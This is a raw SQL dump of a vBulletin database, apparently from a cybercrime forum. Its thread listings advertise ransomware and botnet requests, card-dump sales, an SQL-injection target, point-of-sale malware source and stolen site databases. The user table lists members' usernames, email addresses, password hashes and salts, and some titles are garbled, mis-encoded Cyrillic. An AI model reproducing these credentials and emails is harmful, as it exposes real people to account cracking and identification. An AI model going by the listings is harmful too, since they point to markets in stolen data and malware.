(2327, 'w0rm.ws Jabber', '', 0, 0, 1442782936, 13, 2239, 10, 2, 0, 0, 'admin', 1, 'w0rm', 1442485139, 35, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2325, 'slider', '', 2793, 2793, 1442914240, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442914240, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2324, 'riss', '', 2792, 2792, 1442908839, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442908839, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2323, '500mhz', '', 2791, 2791, 1442903806, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442903806, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2322, 'nickname', '', 2790, 2790, 1442902476, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442902476, 1, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2321, 'esmurf', '', 2789, 2789, 1442837150, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442837150, 2, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2320, 'nickname', '', 2788, 2788, 1442836800, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442836800, 0, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2298, 'Loladr', '', 2762, 2762, 1442751871, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442751871, 6, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2297, 'name', '', 2761, 2761, 1442746754, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442746754, 2, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2296, 'D9', '', 2760, 2760, 1442746155, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442746155, 6, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2295, 'deadeye', '', 2759, 2759, 1442743557, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442743557, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2280, 'bat9user', '', 2743, 2743, 1442693307, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442693307, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2279, 'bat9user', '', 2742, 2742, 1442693266, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442693266, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2278, 'maktorin', '', 2741, 2741, 1442689256, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442689256, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2277, 'T0fe1', '', 2740, 2740, 1442685870, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442685870, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2276, 'test', '', 2739, 2739, 1442680894, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442680894, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2275, 'Zhidyaev', '', 2738, 2738, 1442680431, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442680431, 3, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2274, 'Romajkee', '', 2737, 2737, 1442677174, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442677174, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2273, 'crazystik', '', 2736, 2736, 1442675073, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442675073, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2272, 'AndryOsminin', '', 2735, 2735, 1442673506, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442673506, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2269, 'nyxa', '', 2732, 2732, 1442662987, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442662987, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2268, 'citizenx', '', 2731, 2731, 1442658373, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442658373, 6, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2267, 'Amir aka Temur', '', 2730, 2730, 1442649812, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442649812, 6, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2266, 'liteh', '', 2729, 2729, 1442647827, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442647827, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2265, 'nickname', '', 2728, 2728, 1442615581, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442615581, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2264, 'nickname', '', 2727, 2727, 1442608074, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442608074, 1, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2263, 'koshevsky', '', 2726, 2726, 1442605962, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442605962, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2262, 'ynk', '', 2725, 2725, 1442605632, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442605632, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2261, 'nickname', '', 2724, 2724, 1442603835, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442603835, 1, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2260, 'Chex', '', 2723, 2723, 1442601382, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442601382, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2259, 'Chex', '', 2722, 2722, 1442600723, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442600723, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2258, 'nickname', '', 2721, 2721, 1442599899, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442599899, 1, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2257, 'Dasfeer', '', 2720, 2720, 1442599739, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442599739, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2256, 'Chex', '', 2719, 2719, 1442599107, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442599107, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2255, 'chip3ra', '', 2718, 2718, 1442596340, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442596340, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2254, 'Upir', '', 2717, 2717, 1442595269, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442595269, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2253, 'kjk', '', 2716, 2716, 1442594552, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442594552, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2252, 'nickname', '', 2715, 2715, 1442592266, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442592266, 2, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2249, 'ssdtux', '', 2712, 2712, 1442586955, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442586955, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2244, '0R1en', '', 2707, 2707, 1442584017, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442584017, 6, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2243, 'Sawyer', '', 2706, 2706, 1442583758, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442583758, 5, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2239, 'w0rm.ws Jabber', '', 2702, 3021, 1457279382, 32, 0, 1, 3, 1, 0, 'admin', 1, 'tdss', 1442485139, 841, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2240, '#ziga', '', 2703, 2703, 1442583324, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442583324, 4, 0, '', 1, 1, 0, 0, 0, '', NULL),
(2504, '(REQ) GM Cryptolocker', '', 3043, 3043, 1462955681, 15, 0, 1, 0, 0, 0, 'Scrack', 308, 'Scrack', 1462955681, 30, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2413, 'I am good seller for eu,usa,canada dumps only .', '', 2925, 2925, 1447485371, 10, 0, 1, 0, 0, 0, 'ValidFlash', 294, 'ValidFlash', 1447485371, 29, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2410, '[SQLi]shopcc.ru', '', 2920, 2924, 1447373141, 10, 0, 1, 2, 0, 0, 'FoxDesierto', 287, 'FoxDesierto', 1447203548, 95, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2417, 'stells is ripper that i did escrow with', '', 2931, 2931, 1448155601, 13, 0, 1, 0, 0, 0, 'unixman', 309, 'unixman', 1448155601, 26, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2418, 'Hacking Tools resources list', '', 2932, 2932, 1448260568, 10, 0, 1, 0, 0, 0, 'dark001', 178, 'dark001', 1448260568, 26, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2447, 'FuckAV.ru [private]', '', 0, 0, 1403408824, 10, 1030, 10, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403408824, 128, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2448, 'OpenSC.ws', '', 0, 0, 1403408894, 10, 1031, 10, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403408894, 95, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2450, 'coru.in (coru.ws)', '', 0, 0, 1420649717, 10, 1092, 10, 3, 0, 0, 'w0rm', 1, 'demonic', 1404040431, 253, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2451, '.blackhatworld.com', '', 0, 0, 1436321646, 10, 1145, 10, 1, 0, 0, 'w0rm', 1, 'Versus71', 1405265072, 123, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2452, 'proclub.ws', '', 0, 0, 1405718951, 10, 1196, 10, 0, 0, 0, 'w0rm', 1, 'w0rm', 1405718951, 125, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2484, 'k-vrachu.ru dumps+src', '', 2990, 2990, 1454595678, 7, 0, 1, 0, 0, 0, 'w0rm', 100, 'w0rm', 1454595678, 50, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2488, '(REQ)Android Botnet', '', 2996, 3006, 1456182150, 15, 0, 1, 6, 0, 0, 'Scrack', 308, 'Scrack', 1455433172, 98, 4, '', 1, 0, 0, 0, 0, '', NULL),
(2507, 'db icloud', '', 3047, 3047, 1464181751, 18, 0, 1, 0, 0, 0, 'st1x0', 171, 'st1x0', 1464181751, 26, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2508, 'Need to buy traffic or web shell', '', 3048, 3048, 1464450174, 32, 0, 1, 0, 1, 0, 'hunter_exploitkit', 172, 'hunter_exploitkit', 1464450174, 285, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2509, 'D+P seller = banned!', '', 3050, 3050, 1464452024, 24, 0, 1, 0, 0, 0, 'ke7hb', 387, 'ke7hb', 1464452024, 17, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2494, 'Katrina POS Source', '', 3012, 3012, 1456447580, 15, 0, 1, 0, 0, 0, 'Scrack', 308, 'Scrack', 1456447580, 62, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2495, 'mystart.com', '', 3015, 3015, 1456538961, 7, 0, 1, 0, 0, 0, 'w0rm', 100, 'w0rm', 1456538961, 60, 0, '', 1, 0, 0, 0, 0, '', NULL),
(2497, 'MATE1 database', '', 3026, 3026, 1458612896, 37, 0, 1, 0, 0, 0, 'orion', 283, 'orion', 1458612896, 7, 0, '', 0, 0, 0, 0, 0, '', NULL),
(2501, 'naughtyamerica.com', '', 3037, 3037, 1460311677, 37, 0, 1, 0, 0, 0, 'orion', 283, 'orion', 1460311677, 4, 0, '', 0, 0, 0, 0, 0, '', NULL),
(2503, 'zoosk.com dump', '', 3042, 3042, 1462791410, 7, 0, 1, 0, 0, 0, 'admin', 1, 'admin', 1462791410, 12, 0, '', 1, 0, 0, 0, 0, '', NULL);
DROP TABLE IF EXISTS `threadrate`;
CREATE TABLE `threadrate` (
`threadrateid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`vote` smallint(6) NOT NULL DEFAULT '0',
`ipaddress` char(15) NOT NULL DEFAULT '',
PRIMARY KEY (`threadrateid`),
KEY `threadid` (`threadid`,`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `threadread`;
CREATE TABLE `threadread` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`readtime` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`,`threadid`),
KEY `readtime` (`readtime`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `threadredirect`;
CREATE TABLE `threadredirect` (
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`expires` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`threadid`),
KEY `expires` (`expires`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `threadviews`;
CREATE TABLE `threadviews` (
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
KEY `threadid` (`threadid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `threadviews` (`threadid`) VALUES
(1021),
(1026),
(1057),
(1074),
(1092),
(1232),
(1336),
(1819),
(1834),
(1840),
(1861),
(2400),
(2410),
(2418),
(2494),
(2507),
(2507);
DROP TABLE IF EXISTS `upgradelog`;
CREATE TABLE `upgradelog` (
`upgradelogid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`script` varchar(50) NOT NULL DEFAULT '',
`steptitle` varchar(250) NOT NULL DEFAULT '',
`step` smallint(5) unsigned NOT NULL DEFAULT '0',
`startat` int(10) unsigned NOT NULL DEFAULT '0',
`perpage` smallint(5) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`upgradelogid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
`userid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0',
`membergroupids` char(250) NOT NULL DEFAULT '',
`displaygroupid` smallint(5) unsigned NOT NULL DEFAULT '0',
`username` varchar(100) NOT NULL DEFAULT '',
`password` char(32) NOT NULL DEFAULT '',
`passworddate` date NOT NULL DEFAULT '0000-00-00',
`email` char(100) NOT NULL DEFAULT '',
`styleid` smallint(5) unsigned NOT NULL DEFAULT '0',
`parentemail` char(50) NOT NULL DEFAULT '',
`homepage` char(100) NOT NULL DEFAULT '',
`icq` char(20) NOT NULL DEFAULT '',
`aim` char(20) NOT NULL DEFAULT '',
`yahoo` char(32) NOT NULL DEFAULT '',
`msn` char(100) NOT NULL DEFAULT '',
`skype` char(32) NOT NULL DEFAULT '',
`showvbcode` smallint(5) unsigned NOT NULL DEFAULT '0',
`showbirthday` smallint(5) unsigned NOT NULL DEFAULT '2',
`usertitle` char(250) NOT NULL DEFAULT '',
`customtitle` smallint(6) NOT NULL DEFAULT '0',
`joindate` int(10) unsigned NOT NULL DEFAULT '0',
`daysprune` smallint(6) NOT NULL DEFAULT '0',
`lastvisit` int(10) unsigned NOT NULL DEFAULT '0',
`lastactivity` int(10) unsigned NOT NULL DEFAULT '0',
`lastpost` int(10) unsigned NOT NULL DEFAULT '0',
`lastpostid` int(10) unsigned NOT NULL DEFAULT '0',
`posts` int(10) unsigned NOT NULL DEFAULT '0',
`reputation` int(11) NOT NULL DEFAULT '10',
`reputationlevelid` int(10) unsigned NOT NULL DEFAULT '1',
`timezoneoffset` char(4) NOT NULL DEFAULT '',
`pmpopup` smallint(6) NOT NULL DEFAULT '0',
`avatarid` smallint(6) NOT NULL DEFAULT '0',
`avatarrevision` int(10) unsigned NOT NULL DEFAULT '0',
`profilepicrevision` int(10) unsigned NOT NULL DEFAULT '0',
`sigpicrevision` int(10) unsigned NOT NULL DEFAULT '0',
`options` int(10) unsigned NOT NULL DEFAULT '33554447',
`birthday` char(10) NOT NULL DEFAULT '',
`birthday_search` date NOT NULL DEFAULT '0000-00-00',
`maxposts` smallint(6) NOT NULL DEFAULT '-1',
`startofweek` smallint(6) NOT NULL DEFAULT '1',
`ipaddress` char(15) NOT NULL DEFAULT '',
`referrerid` int(10) unsigned NOT NULL DEFAULT '0',
`languageid` smallint(5) unsigned NOT NULL DEFAULT '0',
`emailstamp` int(10) unsigned NOT NULL DEFAULT '0',
`threadedmode` smallint(5) unsigned NOT NULL DEFAULT '0',
`autosubscribe` smallint(6) NOT NULL DEFAULT '-1',
`pmtotal` smallint(5) unsigned NOT NULL DEFAULT '0',
`pmunread` smallint(5) unsigned NOT NULL DEFAULT '0',
`salt` char(30) NOT NULL DEFAULT '',
`ipoints` int(10) unsigned NOT NULL DEFAULT '0',
`infractions` int(10) unsigned NOT NULL DEFAULT '0',
`warnings` int(10) unsigned NOT NULL DEFAULT '0',
`infractiongroupids` varchar(255) NOT NULL DEFAULT '',
`infractiongroupid` smallint(5) unsigned NOT NULL DEFAULT '0',
`adminoptions` int(10) unsigned NOT NULL DEFAULT '0',
`profilevisits` int(10) unsigned NOT NULL DEFAULT '0',
`friendcount` int(10) unsigned NOT NULL DEFAULT '0',
`friendreqcount` int(10) unsigned NOT NULL DEFAULT '0',
`vmunreadcount` int(10) unsigned NOT NULL DEFAULT '0',
`vmmoderatedcount` int(10) unsigned NOT NULL DEFAULT '0',
`socgroupinvitecount` int(10) unsigned NOT NULL DEFAULT '0',
`socgroupreqcount` int(10) unsigned NOT NULL DEFAULT '0',
`pcunreadcount` int(10) unsigned NOT NULL DEFAULT '0',
`pcmoderatedcount` int(10) unsigned NOT NULL DEFAULT '0',
`gmmoderatedcount` int(10) unsigned NOT NULL DEFAULT '0',
`oauth_token` varchar(255) NOT NULL,
`oauth_token_secret` varchar(255) NOT NULL,
PRIMARY KEY (`userid`),
KEY `usergroupid` (`usergroupid`),
KEY `username` (`username`),
KEY `birthday` (`birthday`,`showbirthday`),
KEY `birthday_search` (`birthday_search`),
KEY `referrerid` (`referrerid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `user` (`userid`, `usergroupid`, `membergroupids`, `displaygroupid`, `username`, `password`, `passworddate`, `email`, `styleid`, `parentemail`, `homepage`, `icq`, `aim`, `yahoo`, `msn`, `skype`, `showvbcode`, `showbirthday`, `usertitle`, `customtitle`, `joindate`, `daysprune`, `lastvisit`, `lastactivity`, `lastpost`, `lastpostid`, `posts`, `reputation`, `reputationlevelid`, `timezoneoffset`, `pmpopup`, `avatarid`, `avatarrevision`, `profilepicrevision`, `sigpicrevision`, `options`, `birthday`, `birthday_search`, `maxposts`, `startofweek`, `ipaddress`, `referrerid`, `languageid`, `emailstamp`, `threadedmode`, `autosubscribe`, `pmtotal`, `pmunread`, `salt`, `ipoints`, `infractions`, `warnings`, `infractiongroupids`, `infractiongroupid`, `adminoptions`, `profilevisits`, `friendcount`, `friendreqcount`, `vmunreadcount`, `vmmoderatedcount`, `socgroupinvitecount`, `socgroupreqcount`, `pcunreadcount`, `pcmoderatedcount`, `gmmoderatedcount`, `oauth_token`, `oauth_token_secret`) VALUES
(1, 6, '', 0, 'admin', '70ea01fe71fcf2d6131bef3b006b2d8e', '2016-02-23', '', 0, '', '', '', '', '', '', '', 2, 2, 'Administrator', 0, 1420392420, 0, 1464867330, 1464947462, 1462791410, 0, 0, 10, 1, '0', 0, 0, 0, 0, 0, 11536471, '', '0000-00-00', -1, 1, '', 0, 0, 0, 0, -1, 5, 1, '*&2>Toi\'x{(c:k3}cOO<>N5)x*P\"bG', 0, 0, 0, '', 0, 0, 399, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(2, 2, '', 0, 'Invite', '28aa3e52103e17f2b886eb4dd157c8eb', '2014-05-25', '', 0, '', '', '', '', '', '', '', 1, 0, 'Senior Member', 0, 1401018300, -1, 1401018369, 1401018300, 1443389868, 0, 806, 30, 5, '0', 0, 0, 0, 0, 0, 45100119, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'q{kb8DNloJ5??+v/W\'+$][;~|4hL7C', 0, 0, 0, '', 0, 0, 123, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(3, 7, '', 0, 'Kingbeef', 'ab8f06c388b319233ca39c680c66f1e0', '2014-05-31', '', 0, '', '', '', '', '', '', '', 1, 0, 'Moderator', 0, 1401572820, -1, 1462900124, 1465686349, 1445878300, 2898, 4, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', 40, 1, '', 0, 0, 0, 0, -1, 1, 0, 'jswCNyf\',pqvo_Y8W[e<\"4Gl\"$[)b_', 0, 0, 0, '', 0, 0, 117, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(6, 7, '', 0, 'kx00', '1468821027284ebe0e6ff2ec5698b1a4', '2014-06-23', 'kx00ru@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Üþôõрðтþр', 0, 1403322300, -1, 1411834972, 1411922193, 1410796176, 2048, 18, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'Rok]{gD\":K}Wi!%mk1\\`*@%3-tXCK?', 0, 0, 0, '', 0, 0, 61, 0, 0, 1, 0, 0, 0, 0, 0, 0, '', ''),
(7, 2, '', 0, 'Bo0om', '70ee4d57cfd344017c68e91ef808a004', '2015-03-27', 'i@bo0om.ru', 0, '', 'http://bo0om.ru/', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1403411880, -1, 1412005431, 1427449141, 1411008788, 2081, 8, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 6, 2, 'xu~/@RT|4%v-Og@K^!c#WA.2iRF4BZ', 0, 0, 0, '', 0, 0, 78, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(8, 2, '', 0, '090h', '58ca820c210bf4677035d9738d4d9f1d', '2014-08-16', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1403411940, -1, 1408228515, 1408231800, 0, 0, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 1, ';!6\"||j$?kZ.._nJ6V\"`JAEk({.}A|', 0, 0, 0, '', 0, 0, 41, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(9, 2, '', 0, 'null', 'c488d48fcad46582cfb46c9641f12f37', '2014-08-13', '', 0, '', '', '', '', '', '', '', 1, 0, 'Member', 0, 1403417280, -1, 1426972425, 1427522940, 1420887840, 2228, 43, 10, 5, '0', 0, 0, 0, 0, 0, 45092439, '', '0000-00-00', -1, 1, '', 0, 0, 0, 0, -1, 1, 0, 'gh[Q|9j*,|5Rt41\"^0\"1#+d%MZwm2`', 0, 0, 0, '', 0, 0, 89, 0, 0, 3, 0, 0, 0, 0, 0, 0, '', ''),
(10, 2, '', 0, 'skiffha', '1eb098495d5a69974aa2fed86cceff07', '2014-06-22', 'skiffha@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1403420580, -1, 1456750665, 1456896780, 1403539020, 0, 9, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '`)\\vn^AyR,yhe,|b|DHvcBcG-O{<*I', 0, 0, 0, '', 0, 0, 67, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(11, 7, '', 0, 'Psych0tr1a', '5807d6227380aaaebebd067db1b431e0', '2016-03-16', 'w@inbox.ru', 0, '', '', '277777777', '', '', '', '', 1, 0, 'Moderator', 0, 1403471700, -1, 1475239107, 1475239107, 1445622989, 2892, 53, 10, 5, '3', 0, 0, 0, 0, 0, 45616215, '', '0000-00-00', -1, 1, '', 0, 0, 0, 0, -1, 32, 0, 'atxlsjXZD*6rQ4Oe`.D9ozgC2x^:3x', 0, 0, 0, '', 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(13, 8, '', 0, 'syslink', '76a1ae1933e3a5b9b8431dcad39db3e7', '2014-09-12', '', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1403821140, -1, 1474285078, 1474285078, 1455753840, 2999, 17, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 19, 0, 'BnjSAlJ@2||${b?X1^VC/j7aV0tD5_', 0, 0, 0, '', 0, 0, 162, 1, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(14, 2, '', 0, 'trueEv1l', '2cc5a2c09db2938b8577da630431dc15', '2014-06-27', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1403883360, -1, 1403883427, 1403883960, 0, 0, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'jE9El9g6F#aEAK,6|zcO0\\3VR%!8o>', 0, 0, 0, '', 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(16, 2, '', 0, 'oaz', 'b626879e3c4c6c95b3685941a65e501d', '2014-07-02', 'oaz@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1403898900, -1, 1464045006, 1464045006, 0, 0, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'ny\'-*Rw[tK2OMeJ|.`]kNC2b>nXM=#', 0, 0, 0, '', 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(18, 2, '', 0, 'xargs', '9b35781529f1e87b00b9b410a55a1982', '2014-06-29', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404044220, -1, 1474284288, 1474284288, 0, 0, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '^vSku^d)2;`\'m}g<(d_uj]-8;ko@Eg', 0, 0, 0, '', 0, 0, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(19, 2, '', 0, 'Ereee', 'a21a357dff0323e5b7faeb67dcded588', '2014-06-30', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404145680, -1, 1406139316, 1406843280, 1406049840, 1314, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '[w*i6Gm<}!vE{awFuLNdsy{wed4Hy)', 0, 0, 0, '', 0, 0, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(22, 2, '', 0, 'awert', 'ce368ee1dbb4e3565a52dbc5a4594d21', '2014-07-07', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404753600, -1, 1411985909, 1412001065, 1411985908, 2216, 6, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 7, 0, '=nT.v!7geUSVMHG%4cJ,v\\:Q&\\ti|/', 0, 0, 0, '', 0, 0, 29, 0, 0, 1, 0, 0, 0, 0, 0, 0, '', ''),
(23, 2, '', 0, 'hackdays', '4d0fca66247bba39c071e16dd4242377', '2014-07-09', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404759720, -1, 1447963286, 1447963286, 1406087760, 1317, 1, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'kzQP`B}jezXCF0pJ%a!?YY)&H3~XkS', 0, 0, 0, '', 0, 0, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(24, 2, '', 0, 'opium', '90d6a2bc92d21e1662cb5e4f99435048', '2014-07-07', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404760140, -1, 1464044881, 1464044881, 1408500220, 0, 1, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, ';usfYyw4U}}BnN)8X{Q-g3#_HmTGC[', 0, 0, 0, '', 0, 0, 113, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(25, 7, '', 0, 'mb1', '3b63ea1c474827f5029ffe1df82a23f6', '2014-07-10', '', 0, '', '', '', '', '', '', '', 1, 0, 'Üþôõрðтþр', 0, 1405021080, -1, 1407859800, 1407954012, 1407831660, 0, 2, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '1>bN@ixb=*13a-WrBW_FvXhHnYS@aP<-}94NH#5}-rE', 0, 0, 0, '', 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
